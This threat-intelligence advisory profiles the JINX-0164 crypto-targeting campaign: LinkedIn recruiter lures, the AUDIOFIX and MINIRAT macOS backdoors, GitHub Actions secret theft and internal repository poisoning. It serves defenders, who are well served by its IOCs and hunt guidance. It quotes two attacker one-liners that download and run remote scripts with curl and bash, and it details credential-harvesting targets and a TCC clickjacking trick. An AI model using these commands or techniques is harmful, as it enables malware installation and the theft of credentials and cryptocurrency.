# JINX-0164 — Crypto-Targeting macOS AUDIOFIX RAT via LinkedIn Social Engineering and Internal CI/CD Hijacking (Wiz CIRT)

> Wiz CIRT and Wiz Research disclosed JINX-0164 on 2026-05-27 — a financially motivated threat cluster active since mid-2025 that targets cryptocurrency organizations with LinkedIn recruiter lures, the custom macOS Python RAT AUDIOFIX (delivered via a ClickFix one-liner from fake teleconferencing/driver domains), and automated GitHub Actions secret theft via nord-stream. The actor laterally moves by injecting AUDIOFIX into internal Git repositories using developer impersonation, turning the victim's CI/CD pipeline into a propagation vector. JINX-0164 has trojanized the @velora-dex/sdk npm package (v4.9.1) and targets 51 crypto wallet extensions plus 2 desktop wallet apps; TTPs overlap with DPRK UNC1069/Sapphire Sleet but Wiz tracks the cluster as distinct.

- **Published:** 2026-05-27T00:00:00Z
- **Last reviewed:** 2026-05-27T00:00:00Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-0607
- **ID:** TL-2026-0607
- **Severity:** CRITICAL
- **Category:** APT
- **Status:** ACTIVE
- **Actor:** JINX-0164 (North Korea)
- **Detections:** 9 · **IOCs:** 68 (full data via the Threadlinqs MCP server — Purple tier)

## Description

## Overview

JINX-0164 is a financially motivated threat cluster, first publicly named by Wiz CIRT and Wiz Research on 2026-05-27, that has targeted the cryptocurrency industry since at least mid-2025. The actor pairs LinkedIn-driven social engineering with custom macOS malware (AUDIOFIX, MINIRAT), automated CI/CD secret theft via nord-stream, and internal source-repository poisoning to propagate malware across developer infrastructure. While JINX-0164's TTPs overlap with DPRK clusters UNC1069 and Sapphire Sleet (per Microsoft's April 2026 reporting), Wiz attributes the activity to a distinct cluster with no infrastructure overlap to publicly tracked North Korean groups — and assesses the motivation as financial rather than state-directed espionage. The actor has demonstrated supply-chain capability by trojanizing version 4.9.1 of the npm package @velora-dex/sdk on 2026-04-07 (a popular DEX aggregation SDK), and has stood up an extensive lookalike-domain infrastructure spoofing Microsoft Teams, Slack, Aircall, Dialpad, BitGet, and macOS driver-update portals.

## Initial Access — LinkedIn Recruiter Lure ("Contagious Interview" variant)

JINX-0164 operators run a recruitment-themed pretext consistent with the broader "Contagious Interview" pattern attributed to DPRK clusters. Initial contact is via LinkedIn, using either compromised legitimate accounts belonging to professionals in the crypto industry or fully fabricated profiles with established connections and relevant employment history (these synthetic profiles are deleted shortly after compromise and never re-enabled). The actor proposes a virtual meeting on Microsoft Teams, Slack, Aircall, or Dialpad and sends a calendar invite pointing at a lookalike domain (e.g., `teams.cam`, `teamicrosoft.com`, `bitget-meeting.com`, `slktest.live`). Inside the spoofed meeting flow, the victim is told there is a technical error and routed to a fake troubleshooting page (e.g., `learn.bitget-meeting[.]com/.../teams-audio-issue-mac`) instructing them to execute a one-liner such as:

`/bin/bash -c "$(curl -fsSL https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh)"`

This "ClickFix"-style social-engineering primitive bypasses macOS Gatekeeper by relying on the victim to invoke `bash` directly against a remote URL.

## Stage 1 — Architecture-Aware Dropper Script

The remote bash script profiles the host via `uname` / `uname -m`, branches between Apple Silicon (arm64) and Intel (x86_64), and pulls the matching binary from a sibling URL on the same delivery domain (e.g., `https://apple.driver-store.com/mac/arm/driver/coreaudiod` vs `.../mac/intel/driver/coreaudiod`). The payload is saved to `~/Library/Application Support/Google/ChromeUpdater`, marked executable with `chmod +x`, and launched as `chrome.job` (or `coreaudio.job` in other variants) via `launchctl submit -l chrome.job -- "$DRIVER_PATH" --update`. Wiz identified four distinct dropper-script variants across three delivery domains; all four are macOS-only and exit silently on Linux/Windows. Known dropper hashes:

- `9c2ce925133a3bf5a924063bbef8df49918d5b7258695c1894cd18c75970157a` — fake audio-fix (apple.driver-store.com)
- `402625ec79e3573a80b6de9b33fc1e503e3c7803603cd958ddd515fb0549007c` — fake audio-fix (apple.driver-update.io)
- `b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17` — fake audio-fix (driver-updater.net)
- `d4e863f9818bfb2f1dd932df6441dff204e6142c3bdb55b298cb08dc7b6a0c62` — fake Chrome-update (apple.driver-store.com)
- `c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e` and `2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460` — supply-chain delivery (89.36.224.5)

## Stage 2 — AUDIOFIX: Python 3.12 Infostealer + Backdoor

AUDIOFIX is a PyInstaller-compiled Python 3.12 binary (ARM64 + x86_64 variants) that masquerades on disk as the macOS system audio driver `coreaudiod`. On first launch it displays a native NSAlert dialog ("the fix has been completed") to placate the user, then establishes persistence by dropping a LaunchAgent under `~/Library/LaunchAgents/` with the `RunAtLoad` and `KeepAlive` flags set to true. Observed plist labels masquerade as legitimate communication apps: `com.microsoft.teams.coreaudiod.plist`, `io.aircall.workspace.helper.plist`, `com.electron.dialpad.helper.plist`.

### Credential Harvesting (broad-spectrum, fully automated)

AUDIOFIX launches dedicated routines that scrape:

- **macOS Keychain** contents (login.keychain-db) and shell-history files (`.zsh_history`, `.bash_history`).
- **Browsers** — credentials, cookies, and session data across 10 browsers (Chrome, Edge, Firefox, Brave, Opera, Arc, Vivaldi, etc.).
- **Cryptocurrency wallets** — 51 wallet browser extensions targeted (MetaMask, Phantom, Coinbase Wallet, Binance Chain Wallet, Trust, Rabby, etc.) plus 2 desktop wallet applications. The configuration enumerates extension IDs and pulls IndexedDB/LevelDB state.
- **Developer credentials** — SSH keys (`~/.ssh/`), AWS credentials (`~/.aws/credentials`, `~/.aws/config`), GCP application-default credentials, Azure CLI tokens, Cloudflare API tokens, Kubernetes kubeconfigs, GitHub PATs (`~/.config/gh/`, `~/.netrc`, environment files), and miscellaneous dotfile-stored secrets.
- **Communication apps** — Discord tokens (LevelDB), Slack cookies and local storage, Telegram `tdata` directory, local Signal database files.
- **Clipboard monitor** — a background thread continuously logs clipboard contents with timestamps (specifically targeting copy-pasted wallet addresses, seed phrases, and passwords).

Collected data is POSTed to `/file/upload` on the C2 domain.

### Command and Control

AUDIOFIX has two known C2 channels:

1. **HTTPS variant (primary)** — AES-256-CBC encryption with three fallback C2 servers stored as encrypted blobs inside the binary. Hardcoded AES key `v59l2uwlow9s1ebuscgfg9k9r4voxkbs` (same key shared with MINIRAT). Two polling modes: normal (5-second interval) and stealth (randomized 10–30 minute intervals). C2 commands include arbitrary Python `exec()`, arbitrary shell commands, file download/upload, restart specific collection routines, and self-destruct. Hardcoded C2 domains: `datahub.ink` (primary, observed resolving to 208.115.220.17 and 185.175.59.85), `cloud-sync.online` (backup), `byte-io.us` (backup).
2. **Dropbox variant (earlier)** — uses hardcoded Dropbox API credentials and the `files_download` / `files_upload` / `files_list_folder` endpoints to fetch tasking and exfiltrate data. Limited backdoor functionality versus the HTTPS variant.

### Social-Engineering Auxiliary Modules

- **Password phishing**: a fake "System Update" NSAlert (built with AppKit/PyObjC) prompts for the user password. The malware validates the entered password using `sudo -k -S pwd`; on success, the cleartext is XOR-encoded (single-byte key `0xAB`) and written to `~/.zsh_cache` before exfiltration. The presence of `~/.zsh_cache` is a high-fidelity host indicator.
- **TCC clickjacking**: AUDIOFIX overlays a transparent fake "Network latency detected" dialog on top of the legitimate macOS TCC permission prompt (triggered via `osascript -e` against Finder Automation). When the victim clicks OK to dismiss the fake warning, they actually click "Allow" on the hidden TCC dialog beneath, granting Full Disk Access. Curiously, this access is never used by the main codebase — its purpose may be to demonstrate the technique or set up follow-on tooling.

### Anti-Analysis

AUDIOFIX checks for debuggers (sysctl `kern.proc.pid` `P_TRACED` flag), virtualization (CPU brand-string and manufacturer-name inspection), and validates Apple code-signing on the host environment. If any check fails, the malware exits silently. A self-destruct command unloads the LaunchAgent, wipes persistence files, clears logs, purges server-side data, and deletes the binary.

## Stage 2b — MINIRAT (Supply-Chain Variant)

MINIRAT is a lightweight Go backdoor (Go module path `alibaba.xyz/minirat`, hence the name) used in the npm supply-chain branch of the operation. SHA-256 of the primary ARM64 sample: `0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270`. MINIRAT reuses the same AES key (`v59l2uwlow9s1ebuscgfg9k9r4voxkbs`) and three C2 domains as AUDIOFIX, confirming a shared toolchain. On launch it collects hostname and username, queries `https://api.ipify.org` for the public IP, uses the Mac's hardware UUID as the persistent agent identifier, and sets persistence via a plist at `~/Library/LaunchAgents/` with label `com.apple.Terminal.profiler` (RunAtLoad + KeepAlive). Backdoor commands: shell execution, file upload, file download, tar+upload of arbitrary directories. No automated credential harvesting (unlike AUDIOFIX).

## Stage 3 — Cloud and Version-Control Credential Abuse

After harvesting GitHub Personal Access Tokens from the developer endpoint, JINX-0164 pivots into the victim organization's CI/CD pipelines. The operators run the open-source tool **nord-stream** to automatically enumerate GitHub Actions secrets and Azure DevOps pipeline variables, then exfiltrate them by injecting throwaway workflows. nord-stream's default artifacts are easily fingerprinted and constitute one of the highest-fidelity hunt opportunities for this activity:

- Branch: `dev_remote_ea5Eu/test/v1`
- Committer name: `nord-stream`
- Committer email: `nord-stream@localhost.com`
- Commit messages: "Test deployment" and "Remove test deployment"
- User agent: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36`
- GitHub workflow filename: `init_ZkITM.yaml`
- Azure DevOps pipeline name: `Build_pipeline_58675`, repository: `TestDev_ea5Eu`, task: `Task fWQf8`

Cloud credentials harvested from the endpoint (AWS, GCP, Azure, Cloudflare) were observed in some sign-in attempts but the actor showed no interest in cloud enumeration or pivoting — consistent with the financial-monetization focus.

## Stage 4 — Internal Source-Repository Poisoning (Lateral Movement)

The defining innovation of JINX-0164's intrusions is the use of the victim organization's own Git repositories as a worm-like propagation vector. Using the harvested GitHub credentials, the actor commits AUDIOFIX directly into internal repositories so that other developers who pull and build are infected. Three deceptive Git tactics are used:

1. **Developer impersonation** — `committer.name` and `committer.email` are forged to impersonate other developers. Because the commit is unsigned (or signed with the attacker's key under another developer's name), it carries an "Unverified" badge on GitHub but appears authored by a trusted colleague.
2. **Direct-to-main commits** — in repositories without branch protection, the malicious commit is pushed straight to `main`.
3. **Branch hijacking** — in protected-main scenarios, the payload is inserted into an existing feature branch and waits for the legitimate developer to merge it.

The infection then propagates whenever other engineers clone, pull, or build. Wiz's customer detected the spread using GitHub Vigilant Mode (which flags the unverified badge alongside a historical GPG-key/author-name mismatch) and confirmed via GitHub audit logs that the `git push` originated from the initially compromised endpoint.

## Stage 5 — Cryptocurrency Theft and Supply-Chain Operations

The AUDIOFIX wallet-extension enumeration set (51 wallets) and 2 desktop wallet applications enable direct on-host theft of seed phrases, private keys, and active session cookies. In parallel, JINX-0164's supply-chain operation against `@velora-dex/sdk` (npm) on 2026-04-07 affected v4.9.1 only: the attacker appended three lines to `dist/index.js` that base64-decoded to `nohup bash -c "$(curl -fsSL http://89.36.224[.]5/troubleshoot/mac/install.sh)" > /dev/null 2>&1` — pulling MINIRAT onto any developer machine that imported the SDK. The GitHub source repo was not modified, indicating the attackers held only npm credentials for the maintainer account (likely harvested from a prior compromise). Velora is a DEX aggregation protocol with substantial install base in the crypto-developer ecosystem.

## Operational Security

All actor connections to victim cloud tenants were routed through commercial VPN providers: **ExpressVPN, Mullvad VPN, and Astrill VPN**. Astrill VPN is particularly notable as a recurring fixture in DPRK-linked operations, though Wiz does not assess JINX-0164 as DPRK-sponsored.

## Attribution Assessment

Wiz attributes JINX-0164 as a distinct, financially motivated cluster — not currently linkable to any state sponsor. Tactical analogues to UNC1069 / Sapphire Sleet (recruitment-themed lures, macOS-centric tooling, crypto-theft objective) exist but are implemented differently:

| Category | JINX-0164 | Sapphire Sleet |
|----------|-----------|----------------|
| Download lure | Fake error + ClickFix | Fake SDK update |
| Languages | Python 3.12, Go | C/C++, AppleScript |
| Crypto library | PyCryptodome (AES-256-CBC) | wolfSSL |
| HTTP | Python requests / Go net/http | libcurl.4.dylib (linked) |
| Dropper | Bash | AppleScript + cascading curl \| osascript |
| Persistence | `launchctl submit` (LaunchAgent, user scope) | LaunchDaemon at `/Library/LaunchDaemons/` (system scope) |
| Password phishing | Attacker-directed fake dialog (AppKit/PyObjC) | Immediate fake dialog (SwiftUI) with validation |
| Exfiltration | HTTPS chunked / Dropbox API | HTTPS to IP:8443 w/ auth-token header / Telegram Bot API |
| Crypto wallets targeted | 51 | 9 |
| Browsers targeted | 10 | 3 |
| TCC bypass | osascript-triggered + transparent overlay clickjack | Direct SQLite3 manipulation of TCC.db |

The shared crypto-developer victimology and overlapping TTP catalog warrants treating JINX-0164 alongside the broader Contagious Interview / DPRK-adjacent threat landscape, but defenders should not assume infrastructure overlap with named DPRK clusters.

## Defender Priorities

1. Hunt for `~/.zsh_cache`, AUDIOFIX LaunchAgent plists (`com.microsoft.teams.coreaudiod.plist`, `io.aircall.workspace.helper.plist`, `com.electron.dialpad.helper.plist`), and `/audio.lock`, `/helper.log`, `/clip`, `/tokens.txt` artifacts on macOS endpoints, especially developer laptops.
2. Block the C2 domains (`datahub.ink`, `cloud-sync.online`, `byte-io.us`) and resolved C2 IPs (`208.115.220.17`, `185.175.59.85`, `89.36.224.5`) at the egress proxy and EDR DNS layer.
3. Hunt GitHub audit logs for nord-stream fingerprints (`init_ZkITM.yaml`, committer `nord-stream@localhost.com`, branch `dev_remote_ea5Eu/test/v1`).
4. Require branch protection + signed-commit enforcement on all internal-source repositories. Enable GitHub Vigilant Mode for impersonation detection.
5. Educate developers on the recruiter-lure pattern; ban execution of `curl | bash` one-liners from "support" pages.
6. Block or alert on Astrill VPN, Mullvad VPN, and ExpressVPN sign-ins to source-control and CI/CD platforms by developer accounts.


## MITRE ATT&CK

- T1589 Gather Victim Identity Information
- T1593 Search Open Websites/Domains
- T1583 Acquire Infrastructure
- T1587 Develop Capabilities
- T1585 Establish Accounts
- T1586 Compromise Accounts
- T1588 Obtain Capabilities
- T1566 Phishing
- T1195 Supply Chain Compromise
- T1199 Trusted Relationship
- T1059 Command and Scripting Interpreter
- T1204 User Execution
- T1543 Create or Modify System Process
- T1548 Abuse Elevation Control Mechanism
- T1036 Masquerading
- T1497 Virtualization/Sandbox Evasion
- T1622 Debugger Evasion
- T1070 Indicator Removal
- T1090 Proxy
- T1027 Obfuscated Files or Information
- T1056 Input Capture
- T1555 Credentials from Password Stores
- T1552 Unsecured Credentials
- T1528 Steal Application Access Token
- T1539 Steal Web Session Cookie
- T1083 File and Directory Discovery
- T1082 System Information Discovery
- T1526 Cloud Service Discovery
- T1080 Taint Shared Content
- T1550 Use Alternate Authentication Material
- T1115 Clipboard Data
- T1005 Data from Local System
- T1560 Archive Collected Data
- T1071 Application Layer Protocol
- T1102 Web Service
- T1573 Encrypted Channel
- T1105 Ingress Tool Transfer
- T1041 Exfiltration Over C2 Channel
- T1567 Exfiltration Over Web Service
- T1020 Automated Exfiltration

## Sources

- [Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure](https://www.wiz.io/blog/threat-actors-target-crypto-orgs)
- [Velora-DEX SDK compromised on npm — malicious version drops macOS backdoor via launchctl persistence](https://www.stepsecurity.io/blog/velora-dex-sdk-compromised-on-npm-malicious-version-drops-macos-backdoor-via-launchctl-persistence)
- [MINIRAT analysis](https://www.iru.com/blog/minirat)
- [GitHub Attacks: PAT Control Plane (Wiz)](https://www.wiz.io/blog/github-attacks-pat-control-plane)
- [Dissecting Sapphire Sleet's macOS Intrusion — from Lure to Compromise (Microsoft)](https://www.microsoft.com/en-us/security/blog/2026/04/16/dissecting-sapphire-sleets-macos-intrusion-from-lure-to-compromise/)
- [GitHub Vigilant Mode — Displaying verification statuses for all of your commits](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits)
- [Reddit r/CyberSecurityAdvice — BitGet video-call scam attempt (public victim report)](https://www.reddit.com/r/CyberSecurityAdvice/comments/1qrwi9g/video_call_scam_attempt/)
- [nord-stream — automated GitHub Actions / Azure DevOps secrets exfiltration (GitHub project)](https://github.com/synacktiv/nord-stream)
- [MITRE ATT&CK T1566.003 — Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003/)
- [MITRE ATT&CK T1195.002 — Compromise Software Supply Chain](https://attack.mitre.org/techniques/T1195/002/)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-0607
